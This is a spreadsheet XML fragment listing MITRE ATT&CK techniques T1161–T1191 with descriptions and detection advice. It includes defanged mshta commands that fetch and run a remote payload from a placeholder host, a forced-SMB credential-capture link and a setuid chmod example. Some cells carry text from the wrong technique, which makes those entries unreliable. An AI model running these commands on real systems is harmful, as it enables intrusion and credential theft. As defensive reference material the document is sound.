  </si>
  <si>
    <t>Per Apple?s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in &lt;code&gt;/System/Library/LaunchDaemons&lt;/code&gt; and &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt;AppleDocs Launch Agent Daemons. These LaunchDaemons have property list files which point to the executables that will be launchedMethods of Mac Malware Persistence.
Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directoriesOSX Malware Detection. The daemon name may be disguised by using a name from a related operating system or benign software WireLurker. Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root.
The plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon?s executable and gain persistence or Privilege Escalation.</t>
  </si>
  <si>
    <t>Monitor Launch Daemon creation through additional plist files and utilities such as Objective-See's Knock Knock application.</t>
  </si>
  <si>
    <t>Process Monitoring,File monitoring</t>
  </si>
  <si>
    <t>T1161</t>
  </si>
  <si>
    <t>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adjustments are made to the rest of the fields and dependenciesWriting Bad Malware for OSX. There are tools available to perform these changes. Any changes will invalidate digital signatures on binaries because the binary is being modified. Adversaries can remediate this issue by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn?t checked at load timeMalware Persistence on OS X.</t>
  </si>
  <si>
    <t>Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.</t>
  </si>
  <si>
    <t>Binary file metadata,Process Monitoring,Process command-line parameters,File monitoring</t>
  </si>
  <si>
    <t>T1162</t>
  </si>
  <si>
    <t>MacOS provides the option to list specific applications to run when a user logs in. These applications run under the logged in user's context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created themAdding Login Items. Users have direct control over login items installed using a shared file list which are also visible in System PreferencesAdding Login Items. These login items are stored in the user's &lt;code&gt;~/Library/Preferences/&lt;/code&gt; directory in a plist file called &lt;code&gt;com.apple.loginitems.plist&lt;/code&gt;Methods of Mac Malware Persistence.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inMalware Persistence on OS XOSX.Dok Malware.</t>
  </si>
  <si>
    <t>All the login items are viewable by going to the Apple menu -&gt; System Preferences -&gt; Users &amp; Groups -&gt; Login items. This area should be monitored and whitelisted for known good applications. Monitor process execution resulting from login actions for unusual or unknown applications.</t>
  </si>
  <si>
    <t>File monitoring,Syslog monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>T1163</t>
  </si>
  <si>
    <t>During the boot process, macOS and Linux both execute &lt;code&gt;source /etc/rc.common&lt;/code&gt;, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item ScriptsStartup Items. In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.
Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root userMethods of Mac Malware Persistence.</t>
  </si>
  <si>
    <t>The &lt;code&gt;/etc/rc.common&lt;/code&gt; file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior.</t>
  </si>
  <si>
    <t>T1164</t>
  </si>
  <si>
    <t>Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at &lt;code&gt;~/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt; and &lt;code&gt;~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist&lt;/code&gt;. 
An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machineMethods of Mac Malware Persistence.</t>
  </si>
  <si>
    <t>Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.</t>
  </si>
  <si>
    <t>T1165</t>
  </si>
  <si>
    <t>Per Apple?s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup itemsStartup Items. This is technically a deprecated version (superseded by Launch Daemons),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mechanismMethods of Mac Malware Persistence. Additionally, since StartupItems run during the bootup phase of macOS, they will run as root. If an adversary is able to modify an existing Startup Item, then they will be able to Privilege Escalate as well.</t>
  </si>
  <si>
    <t>The &lt;code&gt;/Library/StartupItems&lt;/code&gt; folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist. Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.</t>
  </si>
  <si>
    <t>T1166</t>
  </si>
  <si>
    <t>When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively. Normally an application is run in the current user?s context, regardless of which user or group owns the application.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&lt;code&gt;ls -l&lt;/code&gt;. The &lt;code&gt;chmod&lt;/code&gt; program can set these bits with via bitmasking, &lt;code&gt;chmod 4777 [file]&lt;/code&gt; or via shorthand naming, &lt;code&gt;chmod u+s [file]&lt;/code&gt;.
An adversary can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the setsuid or setgid bits to get code running in a different user?s context.</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.</t>
  </si>
  <si>
    <t>T1167</t>
  </si>
  <si>
    <t>In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple?s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.OS X KeychainExternal to DA, the OS X Way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password.OS X Keychain
If an adversary can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etc.OS X KeychainOSX Keydnap malware</t>
  </si>
  <si>
    <t>Process Monitoring,Authentication logs,Syslog monitoring</t>
  </si>
  <si>
    <t>T1168</t>
  </si>
  <si>
    <t>Per Apple?s developer documentation, there are two supported methods for creating periodic background jobs: launchd and cronAppleDocs Scheduling Timed Jobs.
===Launchd===
Each Launchd job is described by a different configuration property list (plist) file similar to Launch Daemons or Launch Agents, except there is an additional key called &lt;code&gt;StartCalendarInterval&lt;/code&gt; with a dictionary of time values AppleDocs Scheduling Timed Jobs. This only works on macOS and OS X.
===cron===
System-wide cron jobs are installed by modifying &lt;code&gt;/etc/crontab&lt;/code&gt; while per-user cron jobs are installed using crontab with specifically formatted crontab files AppleDocs Scheduling Timed Jobs. This works on Mac and Linux systems.
Both methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistenceJanicabMethods of Mac Malware PersistenceMalware Persistence on OS X, to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.</t>
  </si>
  <si>
    <t>Legitimate scheduled jobs may be created during installation of new software or through administration functions. Tasks scheduled with launchd and cron can be monitored from their respective utilities to list out detailed information about the jobs. Monitor process execution resulting from launchd and cron tasks to look for unusual or unknown applications and behavior.</t>
  </si>
  <si>
    <t>T1169</t>
  </si>
  <si>
    <t>The sudoers file, &lt;code&gt;/etc/sudoers&lt;/code&gt;, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the idea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ALL&lt;/code&gt;OSX.Dok Malware. 
Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file though.</t>
  </si>
  <si>
    <t>On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).</t>
  </si>
  <si>
    <t>File monitoring,Syslog monitoring,Authentication logs</t>
  </si>
  <si>
    <t>Defense Evasion Execution</t>
  </si>
  <si>
    <t>T1170</t>
  </si>
  <si>
    <t>Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta.234 HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.235
Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code236237238239240
Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta
Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.241</t>
  </si>
  <si>
    <t>Process monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>T1171</t>
  </si>
  <si>
    <t>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name.206207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 and crack the hashes offline through Brute Force to obtain the plaintext passwords.
Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and Responder.208209210</t>
  </si>
  <si>
    <t>Monitor HKLM\Software\Policies\Microsoft\Windows NT\DNSClient for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled.8
Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
Deploy an LLMNR/NBT-NS spoofing detection tool.9
Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious.</t>
  </si>
  <si>
    <t>Windows Registry, Packet capture, Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>T1172</t>
  </si>
  <si>
    <t>Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS.109 The technique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
Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file though.</t>
  </si>
  <si>
    <t>If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blacklist or whitelist of domain names.1</t>
  </si>
  <si>
    <t xml:space="preserve"> SSL/TLS inspection, Packet capture</t>
  </si>
  <si>
    <t>T1173</t>
  </si>
  <si>
    <t>Windows Dynamic Data Exchange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 DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.113114115
Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands116117, directly or through embedded files118, and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.119 DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.</t>
  </si>
  <si>
    <t>OLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.16
Monitor for Microsoft Office applications loading DLLs and other modules not typically associated with the application.
Monitor for spawning of unusual processes (such as cmd.exe) from Microsoft Office applications.</t>
  </si>
  <si>
    <t>API monitoring, DLL monitoring, Process Monitoring, Windows Registry, Windows event logs</t>
  </si>
  <si>
    <t>T1174</t>
  </si>
  <si>
    <t xml:space="preserve"> Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries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made.272</t>
  </si>
  <si>
    <t>Monitor for change notifications to and from unfamiliar password filters.
Newly installed password filters will not take effect until after a system reboot.
Password filters will show up as an autorun and loaded DLL in lsass.exe.4</t>
  </si>
  <si>
    <t>DLL monitoring, Windows Registry, Process monitoring</t>
  </si>
  <si>
    <t>T1175</t>
  </si>
  <si>
    <t>Windows Distributed Component Object Model (DCOM) is transparent middleware that extends the functionality of Component Object Model (COM)15 beyond a local computer using remote procedure call (RPC) technology. COM is a component of the Windows application programming interface (API) that enables interaction between software objects. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.101102103 By default, only Administrators may remotely activate and launch COM objects through DCOM.
Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications104 as well as other Windows objects that contain insecure methods.105106 DCOM can also execute macros in existing documents107 and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application108, bypassing the need for a malicious document.</t>
  </si>
  <si>
    <t>Modify Registry settings (directly or using Dcomcnfg.exe) in HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{AppID_GUID} associated with the process-wide security of individual COM applications.3
Modify Registry settings (directly or using Dcomcnfg.exe) in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole associated with system-wide security defaults for all COM applications that do no set their own process-wide security.42
Consider disabling DCOM through Dcomcnfg.exe.12
Enable Windows firewall, which prevents DCOM instantiation by default.
Ensure all COM alerts and Protected View are enabled.13</t>
  </si>
  <si>
    <t>API monitoring, Authentication logs, DLL monitoring, Packet capture, Process monitoring, Windows Registry, Windows event logs</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t xml:space="preserve"> Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access.2526 Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so may not be difficult for malicious extensions to defeat automated scanners and be uploaded.27 Once the extension is installed, it can browse to websites in the background,2829 steal all information that a user enters into a browser, to include credentials,3031 and be used as an installer for a RAT for persistence. There have been instances of botnets using a persistent backdoor through malicious Chrome extensions.32 There have also been similar examples of extensions being used for command &amp; control 33.</t>
  </si>
  <si>
    <t>Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.
Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.</t>
  </si>
  <si>
    <t>Network protocol analysis, Packet capture, System calls, Process use of network, Process monitoring, Browser extensions</t>
  </si>
  <si>
    <t>Execution Persistence</t>
  </si>
  <si>
    <t>T1177</t>
  </si>
  <si>
    <t>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process.211 Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., DLL Side-Loading or DLL Search Order Hijacking), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.</t>
  </si>
  <si>
    <t>With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers.5
Utilize the Sysinternals Autoruns/Autorunsc utility9 to examine loaded drivers associated with the LSA.
Utilize the Sysinternals Process Monitor utility to monitor DLL load operations in lsass.exe.8</t>
  </si>
  <si>
    <t xml:space="preserve"> API monitoring, DLL monitoring, File monitoring, Kernel drivers, Loaded DLLs, Process Monitoring</t>
  </si>
  <si>
    <t>T1178</t>
  </si>
  <si>
    <t>The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens.326 An account can hold additional SIDs in the SID-History Active Directory attribute327, allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens). Adversaries may use this mechanism for privilege escalation. With Domain Administrator (or equivalent) rights, harvested or well-known SID values328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 Windows Admin Shares, or Windows Remote Management.</t>
  </si>
  <si>
    <t>Examine data in user’s SID-History attributes using the PowerShell Get-ADUser Cmdlet9, especially users who have SID-History values from the same domain.10
Monitor Account Management events on Domain Controllers for successful and failed changes to SID-History.10 11
Monitor Windows API calls to the DsAddSidHistory function.11</t>
  </si>
  <si>
    <t>API monitoring, Authentication logs, Windows event logs</t>
  </si>
  <si>
    <t>Credential Access Peristence Privilege Escalation</t>
  </si>
  <si>
    <t>T1179</t>
  </si>
  <si>
    <t>Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. Hooking involves redirecting calls to these functions and can be implemented via:
Hooks procedures, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.16110
Import address table (IAT) hooking, which use modifications to a process’s IAT, where pointers to imported API functions are stored.10162163
Inline hooking, which overwrites the first bytes in an API function to redirect code flow.10164163
Similar to Process Injection, adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.
Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access.165
Hooking is commonly utilized by Rootkits to conceal files,
processes, Registry keys, and other objects in order to hide malware and associated behaviors.166</t>
  </si>
  <si>
    <t>Monitor for calls to the SetWindowsHookEx and SetWinEventHook functions, which install a hook procedure.19 Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools 91011 or by programmatically examining internal kernel structures.1213
Rootkits detectors 14 can also be used to monitor for various flavors of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes 15 to compare the in-memory IAT to the real addresses of the referenced functions.163
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process Monitoring, Windows event logs</t>
  </si>
  <si>
    <t>T1180</t>
  </si>
  <si>
    <t>Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.340 The Windows screensaver application scrnsave.exe is located in C:\Windows\System32\ along with screensavers included with base Windows installations. The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence:
SCRNSAVE.exe - set to malicious PE path
ScreenSaveActive - set to '1' to enable the screensaver
ScreenSaverIsSecure - set to '0' to not require a password to unlock
ScreenSaverTimeout - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.341</t>
  </si>
  <si>
    <t>Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.</t>
  </si>
  <si>
    <t>Process Monitoring, Process command-line parameters, Windows Registry, File monitoring</t>
  </si>
  <si>
    <t>Defense Evasion Privilege Escalation</t>
  </si>
  <si>
    <t>T1181</t>
  </si>
  <si>
    <t>Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).131 Registration of new windows classes can include a request for up to 40 bytes of extra window memory (EWM) to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value.132133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take place in the address space of a separate live process. Similar to Process Injection, this may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.10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process.134135</t>
  </si>
  <si>
    <t>Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong2 and SetWindowLong3. Malware associated with this technique have also used SendNotifyMessage12 to trigger the associated window procedure and eventual malicious injection.4</t>
  </si>
  <si>
    <t>API Monitoring</t>
  </si>
  <si>
    <t>Persistence Privilege Escalation</t>
  </si>
  <si>
    <t>T1182</t>
  </si>
  <si>
    <t>Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager are loaded into every process that calls the ubiquitously used application programming interface (API) functions:10
CreateProcess
CreateProcessAsUser
CreateProcessWithLoginW
CreateProcessWithTokenW
WinExec
Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx.1
Tools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location.67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</si>
  <si>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Loaded DLLs, Process Monitoring, Windows Registry</t>
  </si>
  <si>
    <t>Defense Evasion Persistence Privilege Escalation</t>
  </si>
  <si>
    <t>T1183</t>
  </si>
  <si>
    <t>Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, any executable file present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\dbg\ntsd.exe -g notepad.exe”).170
IFEOs can be set directly via the Registry or in Global Flags via the Gflags tool.171 IFEOs are represented as Debugger Values in the Registry under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/&lt;executable&gt; and HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt; where &lt;executable&gt; is the binary on which the debugger is attached.170
Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer.10 Installing IFEO mechanisms may also provide Persistence via continuous invocation.
Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications.172173</t>
  </si>
  <si>
    <t>Monitor for common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS.1
Monitor the IFEOs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx.3</t>
  </si>
  <si>
    <t>Process Monitoring, Windows Registry, Windows event logs</t>
  </si>
  <si>
    <t>T1184</t>
  </si>
  <si>
    <t>Secure Shell (SSH) is a standard means of remote access on Linux and Mac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trivial.335336337 Compromising the SSH agent also provides access to intercept SSH credentials.338
SSH Hijacking differs from use of Remote Services because it injects into an existing SSH session rather than creating a new session using Valid Accounts.</t>
  </si>
  <si>
    <t>Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.</t>
  </si>
  <si>
    <t>Authetication Logs</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t xml:space="preserve"> Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.222
A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet.22329
Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication.224</t>
  </si>
  <si>
    <t>This is a difficult technique to detect because adversary traffic would be masked by normal user traffic. No new processes are created and no additional software touches disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for process injection against browser applications</t>
  </si>
  <si>
    <t>Authentication logs, Packet capture, Process Monitoring, API monitoring</t>
  </si>
  <si>
    <t>T1186</t>
  </si>
  <si>
    <t>Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations.290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opened.291 To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction.292
Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10.293
Adversaries may leverage TxF to a perform a file-less variation of Process Injection called Process Doppelgänging. Similar to Process Hollowing, Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext.293
Process Doppelgänging is implemented in 4 steps293:
Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
Load – Create a shared section of memory and load the malicious executable.
Rollback – Undo changes to original executable, effectively removing malicious code from the file system.
Animate – Create a process from the tainted section of memory and initiate execution.</t>
  </si>
  <si>
    <t>Monitor and analyze calls to CreateTranscation, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory.410
Scan file objects reported during the PsSetCreateProcessNotifyRoutine,11 which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access.4 Also consider comparing file objects loaded in memory to the corresponding file on disk.10
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>API monitoring, Process Monitoring</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>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141 This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources. Web Distributed Authoring and Versioning (WebDAV) is typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443.142143
Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary,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server.144 With access to the credential hash, an adversary can perform off-line Brute Force cracking to gain access to plaintext credentials, or reuse it for Pass the Hash.145
There are several different ways this can occur.146 Some specifics from in-the-wild use include:
A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened. The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request.147
A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials.147</t>
  </si>
  <si>
    <t>Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause.
Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered.7</t>
  </si>
  <si>
    <t>File monitoring, Network protocol analysis, Network device logs, Process use of network</t>
  </si>
  <si>
    <t>T1188</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</si>
  <si>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t>
  </si>
  <si>
    <t>When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.</t>
  </si>
  <si>
    <t>Network protocol analysis, Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t xml:space="preserve"> A drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation. This can happen in several ways, but there are a few main components:
Multiple ways of delivering exploit code to a browser exist, including:
A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, cross-site scripting.
Malicious ads are paid for and served through legitimate ad providers.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attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.110
Typical drive-by compromise process:
A user visits a website that is used to host the adversary controlled content.
Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.
The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
Upon finding a vulnerable version, exploit code is delivered to the browser.
If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
In some cases a second visit to the website after the initial scan is required before exploit code is delivered.
Unlike Exploit Public-Facing Application, the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.</t>
  </si>
  <si>
    <t>Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.
Network intrusion detection systems, sometimes with SSL/TLS MITM inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.
Detecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.</t>
  </si>
  <si>
    <t>Packet capture, Network device logs, Process use of network, Web proxy, Network intrusion detection system, SSL/TLS inspection</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>The use of software, data, or commands to take advantage of a weakness in an Internet-facing computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)123, standard services (like SMB124 or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services.125 Depending on the flaw being exploited this may include Exploitation for Defense Evasion. For websites and databases, the OWASP top 10 gives a good list of the top 10 most common web-based vulnerabilities.126</t>
  </si>
  <si>
    <t>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</si>
  <si>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Application logs, Packet capture, Web logs, Web application firewall logs</t>
  </si>
  <si>
    <t>T1191</t>
  </si>
  <si>
    <t>The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles.45 CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
Adversaries may supply CMSTP.exe with INF files infected with malicious commands.46 Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs47 and/or COM scriptlets (SCT) from remote servers.4849 This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.
CMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.4749</t>
  </si>
  <si>
